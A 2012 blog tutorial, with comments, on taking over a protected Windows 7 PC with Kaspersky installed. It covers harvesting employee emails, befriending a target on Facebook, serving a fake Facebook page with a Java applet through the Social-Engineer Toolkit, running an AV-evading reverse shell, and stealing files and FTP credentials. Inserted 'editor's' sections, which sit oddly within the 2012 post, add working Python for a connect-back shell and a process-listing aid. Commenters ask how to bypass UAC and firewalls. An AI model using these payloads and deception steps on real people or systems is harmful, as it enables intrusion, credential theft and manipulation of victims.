
How To Hack Windows 7 And Bypass Firewall And Kaspersky Antivirus




Ever tried to hack Windows 7? Ever tired of trying to get past antivirus? Then this tutorial is for you. So you want to know how to attack a fully patched and protected Windows 7 SP1 x64 with all its security defenses enabled and running (UAC, DEP, ASLR, EMET, etc.).

Not only that: Kaspersky Internet Security 2012 is also installed, activated and updated to the present moment, and running with its default options (firewall, application control, proactive defense, etc.).



As we know, Windows 7 SP1 has no remote service exploits comparable to MS08-067 on XP or MS09-050 on Vista, because Windows 7 is better hardened and exploit development against it is very hard (good job, Microsoft). Most internet users have Firefox, Chrome or Internet Explorer; not all three, but one or two of them (I use all of them at once :) ).

They also have Adobe Flash Player and Oracle Java installed, so they can watch clips and movies on YouTube and enjoy online games and applications that require Java and Flash. Most of them have an anti-virus with its firewall enabled by default (ESET, Avira, Avast, Kaspersky, BitDefender, etc.).

Let's take a look at the best anti-virus products in the world according to the "Real World" Protection Test chart (updated):

[chart: "Real World" Protection Test results]

We can see that Kaspersky Internet Security 2012 and BitDefender come out on top.



But Kaspersky is the best one from my point of view :)
Let's imagine this scenario:
I work as a penetration tester at a big security company. They asked me to conduct a penetration test for a big customer: client-side/social-engineering only, no web application, network or wireless penetration testing.

I said ok let’s do it.

We finished all the paperwork and other legal stuff, and now I am thinking about how I can penetrate this company.
My company told me that the big customer's website URL is http://www.bigx.com
I made a quick search using Google.


Then I used another tool called theHarvester; you can find it in BackTrack 5 R2 or download it from http://www.edge-security.com/theHarvester.php
I found many emails:

That is good: now I have a starting point, and I can target and attack all the emails I found.
I know this is a big customer and a big company, so they must have big security as well: anti-virus and modern, hardened operating systems like Windows 7 SP1.
So public exploits against IE, Firefox, Flash, Adobe products and other local programs will not work, and the anti-virus will detect and remove the exploits I send to my targets.
My best chance is therefore an evil Java applet that tricks the victim into running it. The only requirement is that the victim has Java installed on his system.
That is fine, as many internet users have Java installed, including me :)




Ok, time to hunt them all ...
I searched on pipl.com, entered all the emails I had, and found a lot of interesting information, like:

[screenshot: pipl.com results]

Note: this is FAKE; I cannot disclose sensitive information about the big company :)

As you can see: name, age, location, gender, and also a Facebook account.

I added this admin@bigx.com as a friend on Facebook and we are now friends.

I chatted with him about his company and some general talk.

After some time we had built up a little trust with each other (enough that I can send him images or links).

Now I start my BackTrack 5 R2 machine and run this cool program:

the Social-Engineer Toolkit, AKA SET



Now it is time to attack my target.

I will create an evil Java applet. In the SET menu I choose
2) Website Attack Vectors
then
 1) Java Applet Attack Method
after that
1)      Web Templates
and then
4. Facebook






Now the most important part: we must use a payload that is not detected by any security product (AV, IPS).

I know that my victim is using Kaspersky Internet Security 2012 on Windows 7 SP1; I asked him in our Facebook chat, "What is the best anti-virus you recommend?"

He replied, "Oh, the best one is Kaspersky Internet Security 2012; we are using it in our company and I personally have it installed on Windows 7."

In my penetration testing lab I tried many of the payloads and most of them were detected by Kaspersky :(
But payload number 11,

  11) SE Toolkit Interactive Shell            Custom interactive reverse toolkit designed for SET

works like a charm and no AV detects it :) (That was true at the time of writing, April 2012; AV signatures change, so re-test any payload in your own lab before relying on it.)

So I choose it and choose port 443 as the local port the payload will connect back to. Outbound HTTPS is almost never blocked by an egress firewall, which is why 443 is the natural choice for a connect-back.

Note: I forwarded two ports on my router (443 and 80) to my machine, so the victim can connect back to me when the payload executes successfully.

Now we are good and ready.
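To make the connect-back concrete, here is an added example (editor's code, not SET's payload) of the mechanism the interactive shell above relies on: the compromised host dials out to the handler, and the handler only ever answers. A firewall that screens inbound connections has nothing to block; forwarding router port 443 to the attacker's machine, as described above, is what lets that outbound hop land. The handler address, port selection and message framing are this example's own choices; both ends run in one process on localhost so the exchange can be exercised offline.

```python
"""Connect-back (reverse) shell round trip: victim side dials OUT to the
handler, handler pushes commands and reads the framed replies.  Editor's
example, not SET's code.  Runs both ends locally for demonstration."""
import socket
import struct
import subprocess
import threading

HANDLER_HOST = "127.0.0.1"   # stands in for the attacker's external IP
EXIT_COMMAND = "exit"


def _recv_exact(sock, n):
    """Read exactly n bytes or raise; a plain recv() may return a short read."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed the connection")
        buf += chunk
    return buf


def victim_connect_back(host, port):
    """Victim side: connect OUT to the handler, then execute whatever arrives.
    Each command is one newline-terminated line; each reply is a 4-byte
    big-endian length followed by the combined stdout/stderr bytes."""
    with socket.create_connection((host, port)) as s, s.makefile("rb") as rx:
        for line in rx:
            cmd = line.decode(errors="replace").rstrip("\r\n")
            if cmd == EXIT_COMMAND:
                break
            try:
                proc = subprocess.run(cmd, shell=True, capture_output=True, timeout=30)
                data = proc.stdout + proc.stderr
            except Exception as exc:        # timeout, missing shell, etc.
                data = repr(exc).encode()
            s.sendall(struct.pack("!I", len(data)) + data)


def run_round_trip(commands, port=0):
    """Handler side: listen, accept the single connect-back, send each command
    and collect its output.  port=0 lets the OS pick a free port; the article
    uses 443.  Returns the stripped output of every command, in order."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((HANDLER_HOST, port))
    srv.listen(1)
    bound_port = srv.getsockname()[1]

    # In the real attack this thread is the payload running on the victim.
    victim = threading.Thread(
        target=victim_connect_back, args=(HANDLER_HOST, bound_port), daemon=True
    )
    victim.start()

    conn, _peer = srv.accept()     # the ONLY direction: victim -> handler
    srv.close()
    outputs = []
    with conn:
        for cmd in commands:
            conn.sendall(cmd.encode() + b"\n")
            (length,) = struct.unpack("!I", _recv_exact(conn, 4))
            outputs.append(_recv_exact(conn, length).decode(errors="replace").strip())
        conn.sendall(EXIT_COMMAND.encode() + b"\n")
    victim.join(timeout=5)
    return outputs


if __name__ == "__main__":
    # "echo" exists in both cmd.exe and /bin/sh, so this runs on either side.
    print(run_round_trip(["echo hello from the victim"]))
```

The length prefix on replies is there so the handler knows when a command's output is complete; a raw shell pipe without framing is what makes many home-grown reverse shells hang or interleave output.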


Now we must send our external IP to the victim. We can look it up with a website such as

getip.com

and you will see your external IP like this:

[screenshot: external IP]

We can hide our external IP by using bit.ly to shorten and conceal the link.

You can see that my external IP is hidden now! (Hidden only from a casual glance: the shortened link still redirects straight to the raw IP, and anyone who expands it sees it.)
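The defender-side mirror of that bit.ly step, as an added example (editor's code, not from the article): follow a shortened link's redirect chain with HEAD requests, never fetching the page body, and flag a final destination whose host is a bare IP address, which is exactly what the link above resolves to. The redirect walk takes its lookup function as a parameter so it runs offline against a constructed redirect table; head_location() is the real-network version. The short host short.example and the 203.0.113.0/24 addresses are placeholders.

```python
"""Expand a shortened URL hop by hop and flag raw-IP destinations.
Editor's example; the redirect table below is constructed, not captured."""
import http.client
import ipaddress
from urllib.parse import urljoin, urlsplit

MAX_HOPS = 10


def head_location(url, timeout=5):
    """One HEAD request; return the Location header for a 3xx, else None."""
    parts = urlsplit(url)
    cls = http.client.HTTPSConnection if parts.scheme == "https" else http.client.HTTPConnection
    conn = cls(parts.hostname, parts.port, timeout=timeout)
    try:
        path = parts.path or "/"
        if parts.query:
            path += "?" + parts.query
        conn.request("HEAD", path)
        resp = conn.getresponse()
        return resp.getheader("Location") if 300 <= resp.status < 400 else None
    finally:
        conn.close()


def expand(url, lookup=head_location):
    """Walk redirects until a hop returns no Location.  Returns (final_url, chain).
    Relative Location values are resolved against the current URL; loops and
    over-long chains raise instead of spinning."""
    chain = [url]
    for _ in range(MAX_HOPS):
        nxt = lookup(url)
        if not nxt:
            return url, chain
        url = urljoin(url, nxt)
        if url in chain:
            raise ValueError("redirect loop at %s" % url)
        chain.append(url)
    raise ValueError("more than %d redirects" % MAX_HOPS)


def host_is_bare_ip(url):
    """True when the URL's host is a literal IPv4/IPv6 address rather than a name."""
    host = urlsplit(url).hostname
    if not host:
        return False
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def assess(url, lookup=head_location):
    """Summary a mail or chat filter could act on before anyone clicks."""
    final, chain = expand(url, lookup)
    return {"final": final, "hops": len(chain) - 1, "bare_ip": host_is_bare_ip(final)}


# Constructed redirect table standing in for live HTTP responses (placeholders).
FAKE_REDIRECTS = {
    "http://short.example/x1": "http://203.0.113.10/",           # raw IP, like the article's link
    "http://short.example/x2": "https://www.example.com/login",
    "http://short.example/loop": "http://short.example/loop2",
    "http://short.example/loop2": "/loop",                        # relative, back to the start
}


def fake_lookup(url):
    return FAKE_REDIRECTS.get(url)


if __name__ == "__main__":
    for short in ("http://short.example/x1", "http://short.example/x2"):
        print(short, "->", assess(short, fake_lookup))
```

A bare-IP destination is not proof of malice, but a link to a consumer site that ends at a raw address with no hostname is out of place and worth a second look before it is opened.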


Now I can send him this link. When he clicks it he sees facebook.com loaded with our Java applet. Note that Kaspersky is running.

He will click Run on the applet's security prompt (he feels secure and is not afraid of anything :) ).

Once he clicks Run, I can see:

[screenshot: SET handler receiving the connection]

Kaspersky is running, Java is running and everything is "secure" :)

But I have a remote shell on my target machine.

Now I can do many things:

Just press 1 to start interacting with the opened session,

then type help to view all supported commands.

I always like a pure Windows command shell, so

I type "shell"

and then "tasklist" to view all running processes (add /svc to see which services each process hosts).

Then:

[screenshot: tasklist output]

OMG, "Kaspersky is running :)"
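Rather than eyeballing that tasklist dump, an added example (editor's code, not from the article) parses the CSV form of the same output, `tasklist /fo csv`, so the process list can be searched: is the AV process actually present, and which processes share the interactive session the applet shell was launched in. The sample output is constructed to match the tasklist CSV layout, and the lookup table holds only the entry this scenario needs, avp.exe for Kaspersky; extend SECURITY_PROCESSES for other vendors.

```python
"""Parse `tasklist /fo csv` output and answer two post-exploitation questions:
which security products are running, and what lives in the user's session.
Editor's example; SAMPLE_TASKLIST is constructed, not captured."""
import csv
import io
import re
import subprocess
import sys

# Constructed sample in `tasklist /fo csv` layout.
SAMPLE_TASKLIST = (
    '"Image Name","PID","Session Name","Session#","Mem Usage"\n'
    '"System Idle Process","0","Services","0","24 K"\n'
    '"csrss.exe","404","Services","0","4,120 K"\n'
    '"avp.exe","1624","Services","0","61,544 K"\n'
    '"explorer.exe","2144","Console","1","58,120 K"\n'
    '"java.exe","3088","Console","1","102,332 K"\n'
)

# Process image name -> product.  Only the entry the article's scenario needs.
SECURITY_PROCESSES = {"avp.exe": "Kaspersky"}


def get_tasklist_csv():
    """Run tasklist on Windows; elsewhere return the constructed sample."""
    if sys.platform != "win32":
        return SAMPLE_TASKLIST
    return subprocess.run(
        ["tasklist", "/fo", "csv"], capture_output=True, text=True, check=True
    ).stdout


def parse_tasklist_csv(text):
    """One dict per process: name, pid, session name, session id, memory in KB."""
    procs = []
    for row in csv.DictReader(io.StringIO(text)):
        procs.append({
            "name": row["Image Name"],
            "pid": int(row["PID"]),
            "session": row["Session Name"],
            "session_id": int(row["Session#"]),
            # "61,544 K" -> 61544; strip every non-digit so locale separators don't matter
            "mem_kb": int(re.sub(r"\D", "", row["Mem Usage"]) or 0),
        })
    return procs


def find_security_products(procs):
    """Sorted product names whose process is present: the 'Kaspersky is running' check."""
    found = {
        SECURITY_PROCESSES[p["name"].lower()]
        for p in procs
        if p["name"].lower() in SECURITY_PROCESSES
    }
    return sorted(found)


def interactive_session_processes(procs):
    """Processes outside session 0 (services), i.e. in the logged-on user's
    session, where the browser-launched Java applet and its shell run."""
    return [p["name"] for p in procs if p["session_id"] != 0]


if __name__ == "__main__":
    procs = parse_tasklist_csv(get_tasklist_csv())
    print("security products:", find_security_products(procs))
    print("interactive session:", interactive_session_processes(procs))
```

The session split matters for the next steps: a shell obtained through the user's Java process runs as that user, in that session, with UAC still in force (as one of the comments below discovered when regedit prompted).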

Now it is time to view files, download/upload, and do some real-world Windows post-exploitation.
We owned our victim and found many sensitive bigx.com files: usernames and passwords, some private documents and photos :), and FileZilla FTP credentials, which we used to connect to their FTP server, and you know the rest ...

"Man, WE defeated them all!!"

Now it is time to write a nice report.

I hope you enjoyed this (FAKE) real-world scenario.

About The Author

Mohamed Ramadan is a security researcher from Egypt. He is interested in penetration testing, malware reverse engineering, securing websites and servers, and forensics. He also teaches penetration testing at Ninja-Sec.com.


20 comments :

Ankit on April 17, 2012 at 2:14 PM said...

That was really "AWESOME"

Anonymous said...

I'm using BackTrack 5. Can it be used as well?

Ankit Jangra on April 17, 2012 at 6:40 PM said...

best post ever....

M.Gazzaly on April 18, 2012 at 12:42 AM said...

Wow!! Nice one!! I really expected this one ;)
After a very long time, a nice one to read on RHA.


Regards
M.Gazzaly
(http://www.gazzaly.info)

Anonymous said...

Nice post... i really like it :)

Anonymous said...

please help!! When i choose option 2 "Website Attack Vectors" it gives me following error.
" Sorry. Metasploit was not found. This feature does not work properly without Metasploit.
Press {return} to go back to the main menu."

Anonymous said...

How to open a port in the router???

Rafay Baloch on April 18, 2012 at 11:42 PM said...

@Anonymous

Try this:

1. Go to cd /pentest/exploits/set/config
2. gedit set_config
3. search for something like metasploit path:
4. Replace it with /opt/metasploit/msf3

mohaab on April 19, 2012 at 12:52 AM said...

just click on this link to learn how to open ports in your router

http://bit.ly/IPK6Me

regards

Karan on April 19, 2012 at 5:47 AM said...

Hello Rafay bro, can you write an article about opening a port on a router?
Please.

Hacking on April 19, 2012 at 9:34 AM said...

good mr.mohaab

thanks :)

my BaDer

Anonymous said...

It tells me that "Sorry. Metasploit was not found. This feature does not work properly without Metasploit.
Press {return} to go back to the main menu."
I'm doing exactly what you say:
1. Go to cd /pentest/exploits/set/config
2. gedit set_config
3. search for something like metasploit path: this one, where must I search for it??? Please help me
4. Replace it with /opt/metasploit/msf3

Black Cloud Hackers on July 6, 2012 at 11:48 AM said...

Our group would like to ask the fellow commentors to join us here::::
blackcloudhackers@gmail.com

Anonymous said...

Hi Rafay,

Thanks for sharing this wonderful tutorial.
I was able to do the test on a Windows 7 box in my lab environment;
however, when I typed regedit from "shell", the user (me) was asked whether he wanted to open the application (UAC). My question:
How to defeat UAC? As the victim should not suspect anything.

With regards,

PointCom

akki on September 26, 2012 at 12:30 AM said...

I am using nmap for detecting open ports. Before I installed Avast Internet Security it was working perfectly fine, but now it can't scan any open ports. Kindly help me get nmap through my Windows firewall and the Avast firewall.

Anonymous said...

Does this hack still work?

Anonymous said...

You call this hacking ?

Shashank Bhattarai on January 5, 2013 at 3:17 AM said...

I want to connect to a remote computer through Wi-Fi without touching the other computer... can you help me with it???

Sidhant Bansal on February 19, 2013 at 5:52 AM said...

Thanks a lot man. It helped me a lot.

About

Rafay Baloch is an Independent security researcher, Internet marketer, Entrepreneur and a SEO consultant, He is the founder of RHA blog and multiple other blogs. Rafay got famous after finding a Remote Code Execution bug inside PayPal for which PayPal awarded him a sum of 10,000$ Read More..

RHA © 2013. All Rights Reserved.